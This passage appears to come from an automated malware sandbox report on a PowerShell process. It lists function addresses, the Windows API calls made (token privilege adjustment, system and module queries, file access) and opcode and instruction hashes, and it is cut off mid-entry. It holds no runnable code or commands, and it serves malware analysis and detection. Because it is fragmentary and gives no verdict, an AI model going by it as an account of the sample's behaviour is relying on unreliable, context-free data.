                                                        • Opcode ID: 1a23153e6bd0a7c1d082b7b45a3940c1f5fc30992e6ca3d4beddf8e57e9aaf29
                                                        • Instruction ID: 3712371f9ebeec50ee763f1fea23aca2c29278a4ac30b80bb49f4b8e3183d23d
                                                        • Opcode Fuzzy Hash: 1a23153e6bd0a7c1d082b7b45a3940c1f5fc30992e6ca3d4beddf8e57e9aaf29
                                                        • Instruction Fuzzy Hash: 85F0FF34500740DFEB20CF05D885761FBA4EF00A21F48C0DACC094F312D675A444CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0277096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: f14b5ce10cb92f9544e103631b1b23923464cc8eac0f59959c22e834e9f9155d
                                                        • Instruction ID: f5a54155148aae109e30c99e5633b033286c2ae42854de5db72b1313e54c7615
                                                        • Opcode Fuzzy Hash: f14b5ce10cb92f9544e103631b1b23923464cc8eac0f59959c22e834e9f9155d
                                                        • Instruction Fuzzy Hash: B4F0A935904744DFEB209F06D889766FBA4EF55621F08C09ADD494B716D375A408CFA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 01F4A39C
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 6e312baecf5613c687b5a812100ad377334136a1ebe72be800d93ba4fc99fb1b
                                                        • Instruction ID: 3ff8ff31589f6aa29072e9a7494c8875243b1d5198db84992f5ae1a6358c0362
                                                        • Opcode Fuzzy Hash: 6e312baecf5613c687b5a812100ad377334136a1ebe72be800d93ba4fc99fb1b
                                                        • Instruction Fuzzy Hash: 3BF0AF35904744DFEB209F05D889765FFA4EF04621F08C09ADD4A4B752E3B6A404CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01F4AA71
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: d6f8ded620c3ebd08b69e051e0b0abd1419734c7c7b62f06aef572cdd1f0f114
                                                        • Instruction ID: 2a29dbf9e236813cb97ac14bd341bb7d3f3062e989475cf91d2afd09aaf4f5ad
                                                        • Opcode Fuzzy Hash: d6f8ded620c3ebd08b69e051e0b0abd1419734c7c7b62f06aef572cdd1f0f114
                                                        • Instruction Fuzzy Hash: 78F0F631940744CFEB10CF05D985761FF94DF04621F08C0DADD0A4F742D275A508CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01F4A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 8913253a74f33a9dde14cd7b1f42f7b46b798b7962c8319167ebf2a8e91d58cc
                                                        • Instruction ID: 4c5bf3002ec0271a1270af051cbc4a790051d888086bbd2b40392b3d5728a197
                                                        • Opcode Fuzzy Hash: 8913253a74f33a9dde14cd7b1f42f7b46b798b7962c8319167ebf2a8e91d58cc
                                                        • Instruction Fuzzy Hash: 49119175509384DFD712CF25DC49B92BFA4DF42220F0980ABED458B253D275A818CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01F4A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 6fd6e127893338da619c590df17c25c7510d7874205b92a29db32e06e1b6cd19
                                                        • Instruction ID: b9ae7e4960e5378b199418d053ba8975f4763efedb5294ae9eb3f5178fdab8f0
                                                        • Opcode Fuzzy Hash: 6fd6e127893338da619c590df17c25c7510d7874205b92a29db32e06e1b6cd19
                                                        • Instruction Fuzzy Hash: EE01A279904740DFEB10DF19DC897A6FFA4DF44220F08C4ABDD0A8F642D676A814CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05710861, Relevance: .0, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2176518909.0000000005710000.00000040.00000001.sdmp, Offset: 05710000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bdcf25ffe5da56b3b703040fe2d672c23287496eb06a006037f8a512ada31445
                                                        • Instruction ID: 1292addeb55817e421940b34df0381de78186f7de1242ed09e9af1067a579f80
                                                        • Opcode Fuzzy Hash: bdcf25ffe5da56b3b703040fe2d672c23287496eb06a006037f8a512ada31445
                                                        • Instruction Fuzzy Hash: 83F0E22120E3E10FC30347285CA48A5BFB29D8712434E42DBD5E6CF1E7DA594C4AD3A3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F423F4, Relevance: .0, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156446448.0000000001F42000.00000040.00000001.sdmp, Offset: 01F42000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e81a5c8897bc83f1f41697505171704b3ce40650641e4603deb56bc26f92147c
                                                        • Instruction ID: 38ab54cd57a2071c5e501dee1cf3ef63a3a5536fc490bc8bb01f7ae5d1b2582e
                                                        • Opcode Fuzzy Hash: e81a5c8897bc83f1f41697505171704b3ce40650641e4603deb56bc26f92147c
                                                        • Instruction Fuzzy Hash: 32D05E79604A818FE7168A1CD1A8BA53FA4AF55B04F4644F9F840CB6B3C769E581D200
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F423BC, Relevance: .0, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156446448.0000000001F42000.00000040.00000001.sdmp, Offset: 01F42000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e5a5aab1af94072d1f914da0c60516348ce2f9743e167bc976f25470ca97d937
                                                        • Instruction ID: 154db7143f671cb72c19d07afc92d9bfbb9b4aae0128e97d04b904176b41fc8b
                                                        • Opcode Fuzzy Hash: e5a5aab1af94072d1f914da0c60516348ce2f9743e167bc976f25470ca97d937
                                                        • Instruction Fuzzy Hash: 00D05E347006818FEB15CA1CD194F697BE4AF40700F0644F8BC008B266C7A5E880C600
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Analysis Process: powershell.exe PID: 1572 Parent PID: 2888 powershell.exeCOMMON

                                                        Executed Functions

                                                        Function 0057ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0057AD37
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: 5bff28a9213027b570a55adc00019d51a3cde47848c6f00241eeb2e53cbb2f1c
                                                        • Instruction ID: f7510421a3cf76c93df07bd5ed0ff4e55b57e3a223268c15736597f9e9681026
                                                        • Opcode Fuzzy Hash: 5bff28a9213027b570a55adc00019d51a3cde47848c6f00241eeb2e53cbb2f1c
                                                        • Instruction Fuzzy Hash: B421D1765097809FEB238F25DC44B92BFB4FF16310F0884DAE9898B563D2319908DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0057AD37
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: d40957444ba9a23f62521ae95baa10820ddb46364f95deccebdb8682b3ddfc21
                                                        • Instruction ID: 72bc86513550394e37d30faf88280eed85661ba564a11b8eb003d1ccedf007fa
                                                        • Opcode Fuzzy Hash: d40957444ba9a23f62521ae95baa10820ddb46364f95deccebdb8682b3ddfc21
                                                        • Instruction Fuzzy Hash: A7114C75500604DFEB218F55E884B56FBA4FF44321F08C46AED498AA62D271E814EB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0057B329
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: abf0be9911ac63fbb8d89584d2f16bbc0c723a285e8f73f87a44fd63ae59d374
                                                        • Instruction ID: b22650afe61730f0ff5ab738d315852bf881aff03a42d1bcb042d4f2ad7b7325
                                                        • Opcode Fuzzy Hash: abf0be9911ac63fbb8d89584d2f16bbc0c723a285e8f73f87a44fd63ae59d374
                                                        • Instruction Fuzzy Hash: 7011A071508380AFDB228F11DC45F62FFB4EF46320F09C49AED894B662C275A918DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0057B329
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: 76ac087b5d326d98c3781b031e54752e5e18986791f392700aeb028f4462a848
                                                        • Instruction ID: 64ed83102001cd720cdf3a938815f2d2d0f1e6e0a1f8e5e404c0be0a7b1a3e49
                                                        • Opcode Fuzzy Hash: 76ac087b5d326d98c3781b031e54752e5e18986791f392700aeb028f4462a848
                                                        • Instruction Fuzzy Hash: D401AD31400700DFEB209F45EC85B66FFA0FF14721F08C99ADD490B616C375A558EB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E80118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 01E801D0
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: 240abdb03fb3f442604b18841e1e374fb7836948cbdd446c9a3bf073661e448e
                                                        • Instruction ID: 2603312209d42e73f95fa88a0717225146386207218d2d8ebaee476a052f3304
                                                        • Opcode Fuzzy Hash: 240abdb03fb3f442604b18841e1e374fb7836948cbdd446c9a3bf073661e448e
                                                        • Instruction Fuzzy Hash: C1314A7650E3C08FE7138B759C65692BFB4AF43224F0E84DBD888CF1A3D6659809D762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E8067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 01E8072D
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 0b20c98738dddef93502ad733f5dbae67c9ba942ccaf24ed295ceb5b2b039a4d
                                                        • Instruction ID: 1d76f436273128c49ffe501b55a5860f3973459bd9c6266467dc5d27efa9ae99
                                                        • Opcode Fuzzy Hash: 0b20c98738dddef93502ad733f5dbae67c9ba942ccaf24ed295ceb5b2b039a4d
                                                        • Instruction Fuzzy Hash: 33316271509380AFE722DF65CC45F56BFF8EF05214F0984AEE9898B293D375A908CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E80D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 01E80DD6
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: 8dac81182a6b8844326952e9ce668dbc706e605f26edcc21b8410832cf5e0c80
                                                        • Instruction ID: 37b9157c4bf325b7d9a4b45eb533a86bb8425cbaacf037c8b93533f868e2f2f7
                                                        • Opcode Fuzzy Hash: 8dac81182a6b8844326952e9ce668dbc706e605f26edcc21b8410832cf5e0c80
                                                        • Instruction Fuzzy Hash: 2F318871509380AFF712DB25DC45B96BFE8DF06214F0444AAF948CB293D275A909C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,8CDA2506,00000000,00000000,00000000,00000000), ref: 0057BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: 783d43305aae2a754fa6cbe0b706ed11b91042827ca99496f309cddd7c1ff7c7
                                                        • Instruction ID: 04db3db42a5747ed64c3ab9211e0cc870e6db520becad6e5cd0f7bf9fd0af3e2
                                                        • Opcode Fuzzy Hash: 783d43305aae2a754fa6cbe0b706ed11b91042827ca99496f309cddd7c1ff7c7
                                                        • Instruction Fuzzy Hash: E831B172409380AFE722CB61DC55F97BFB8EF06310F08849BE985CB192D224A908C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,8CDA2506,00000000,00000000,00000000,00000000), ref: 0057AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: e5ab3b25607d9471d162ff78078a7c8993eb0d52811e2dc5eba73235be6aac5b
                                                        • Instruction ID: 62151fa56c6c0ac323a103facc73e33227425ae30489d0233a7ec1601653e401
                                                        • Opcode Fuzzy Hash: e5ab3b25607d9471d162ff78078a7c8993eb0d52811e2dc5eba73235be6aac5b
                                                        • Instruction Fuzzy Hash: DF21B6B2509380AFE712CF61DC45B96BFB8EF06320F0884DBE989DB193D2659949C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E80FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 01E8109E
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 902da9234bb305d762b47fa377493e2fbeaccf495ae83e04cadafc59a11fdc93
                                                        • Instruction ID: 236f8f24f692f20ca176322c6ac1ce071a80ed1f806d681040f05348783f230e
                                                        • Opcode Fuzzy Hash: 902da9234bb305d762b47fa377493e2fbeaccf495ae83e04cadafc59a11fdc93
                                                        • Instruction Fuzzy Hash: 7731737550E3C09FD3138B358C55B56BFB4AF43610F1A81DBD884CF1A3D629A919C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,8CDA2506,00000000,00000000,00000000,00000000), ref: 0057B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: 656318f01793df58240974686e870b20b9adf222dd91cd3408ac1cc00c454e76
                                                        • Instruction ID: a5ee4ea88964b2715d7981a21636a5108c99baf5476ba40494b74b85f7c0322a
                                                        • Opcode Fuzzy Hash: 656318f01793df58240974686e870b20b9adf222dd91cd3408ac1cc00c454e76
                                                        • Instruction Fuzzy Hash: 4A219171509380AFE722CF15DC45FA7BFA8EF46320F0884AAE949DB152D664A908CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057A1A8, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 0057A23E
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        • Opcode ID: db806a023d691c7ecfcbf7b0c86b24127307d3e1d26b0b9d9b0f5f03f802eb4d
                                                        • Instruction ID: 050da58ba7f182cb1a0b2a2e613cff0b6e99befcf818e567680674ebd99c21b6
                                                        • Opcode Fuzzy Hash: db806a023d691c7ecfcbf7b0c86b24127307d3e1d26b0b9d9b0f5f03f802eb4d
                                                        • Instruction Fuzzy Hash: 4D21B77140D3C0AFD312CB358C55B66BF74EF43610F1981DBD8848B593D229A919C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E80784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,8CDA2506,00000000,00000000,00000000,00000000), ref: 01E80819
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: 1ffbc8599e9887e68d898ab275a0fd5d5e8d3db0d8a8ab08fdc31dec893405e7
                                                        • Instruction ID: 912a8db1d224c96dcb60a95847de626efde4e712468cffc6071a031d3efd77f1
                                                        • Opcode Fuzzy Hash: 1ffbc8599e9887e68d898ab275a0fd5d5e8d3db0d8a8ab08fdc31dec893405e7
                                                        • Instruction Fuzzy Hash: FE210A76408780AFE712CB159C41FA7BFA8EF46724F0881DBF9888B193D224A909C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E80464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 01E80502
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: 719388ed5b9d6b2c1761ec2345302ad220e64e1bd0d15e00d5c1e8bcc964c2f0
                                                        • Instruction ID: 7317c4b4bc3e56039a791e764fc06fc2576715ad8bad648312a832155c207c9c
                                                        • Opcode Fuzzy Hash: 719388ed5b9d6b2c1761ec2345302ad220e64e1bd0d15e00d5c1e8bcc964c2f0
                                                        • Instruction Fuzzy Hash: 0E21717540E3C0AFD3128B758C55B66BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E806AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 01E8072D
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: dfb8f6d517b546e0daadeda14bddd705a332066e5e55d24e4d3f1d3d249ab586
                                                        • Instruction ID: 43c9533454cfc3ef391c20b96edbc49a94eb89bffdf787dc41978cb28d341101
                                                        • Opcode Fuzzy Hash: dfb8f6d517b546e0daadeda14bddd705a332066e5e55d24e4d3f1d3d249ab586
                                                        • Instruction Fuzzy Hash: 06218171500704EFE721EF65CD45F6AFBE8EF08650F04846AE94D8B692D771E908CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E80854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,8CDA2506,00000000,00000000,00000000,00000000), ref: 01E808E5
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 9e405eb3610905bad6f42879efe10d4aaa5448309bfcd2144a5e34c25d1d1fc0
                                                        • Instruction ID: 4f8cf632503c551ee4c519042e569b6532634e266823fe824231c5342df3f2a7
                                                        • Opcode Fuzzy Hash: 9e405eb3610905bad6f42879efe10d4aaa5448309bfcd2144a5e34c25d1d1fc0
                                                        • Instruction Fuzzy Hash: 2B219271409380AFE722CF51DC45F56BFB8EF46314F09849BE9489B153C265A909CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057A8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0057A94A
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: 178030ed713fe4ef8370e0e65ce9cc5f87e8cde7062097ca20c505c79ad191f7
                                                        • Instruction ID: 81a2bcfcf81b0700fcc3652f2e5a77d469462d27bbb22875aa628559ff1377f4
                                                        • Opcode Fuzzy Hash: 178030ed713fe4ef8370e0e65ce9cc5f87e8cde7062097ca20c505c79ad191f7
                                                        • Instruction Fuzzy Hash: 7321A77540D780AFD3138B25DC51B62BFB4EF87710F0981DBE8848B653D224A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E80D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 01E80DD6
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: 016f430b17de4c068740bb64e7d03ec7acc2651e7e1f1369e66d2ac037f73792
                                                        • Instruction ID: 2537a750a14e6bacc06ce8760a451724aa17d1521a8586d7f5d5b3e6ca06c69a
                                                        • Opcode Fuzzy Hash: 016f430b17de4c068740bb64e7d03ec7acc2651e7e1f1369e66d2ac037f73792
                                                        • Instruction Fuzzy Hash: C3218171504240EFF721EF69DC85BAAFBD8EF08614F04846AFD4CDB282D675E908CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,8CDA2506,00000000,00000000,00000000,00000000), ref: 0057BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: 4b83654da90d4c33ebef2462af0eef10bb0291f58aa42caf139e4f8fd0dd4613
                                                        • Instruction ID: c13be1eecdb2a695d84c3db67a4f83571252ba51db84c64ef68dacae735702d1
                                                        • Opcode Fuzzy Hash: 4b83654da90d4c33ebef2462af0eef10bb0291f58aa42caf139e4f8fd0dd4613
                                                        • Instruction Fuzzy Hash: EE118C72500204EFFB21DF51DC85FAAFBACEF04320F14896AE9499A241D670A9049BA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,8CDA2506,00000000,00000000,00000000,00000000), ref: 0057B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: 905bb6d511b674bc08e8227fd5ff3ff5c6f913084b4de7449de4c9ceb6cf0eb5
                                                        • Instruction ID: 6e5988f0b3132f4d459d7095a6e548625e1d258d8b1d6d690a980498c7457d2f
                                                        • Opcode Fuzzy Hash: 905bb6d511b674bc08e8227fd5ff3ff5c6f913084b4de7449de4c9ceb6cf0eb5
                                                        • Instruction Fuzzy Hash: 7D116D71600300EFFB20DF55DC89FA7BBA8EF44760F14C46AE9098B251D764A9049A61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E8137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: 8a57f8b2c39d12949f066367fd1896d97978792185ab8709854a7411d75058e0
                                                        • Instruction ID: b5dc2dd57accb189f2cf95c8545cf5a496f14b504f0a713390007dde2602f19a
                                                        • Opcode Fuzzy Hash: 8a57f8b2c39d12949f066367fd1896d97978792185ab8709854a7411d75058e0
                                                        • Instruction Fuzzy Hash: FA21A7715043809FE722CF15DC45B96FFF4EF06210F09849EDD898B563D2359449DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E80F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 01E80FB0
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
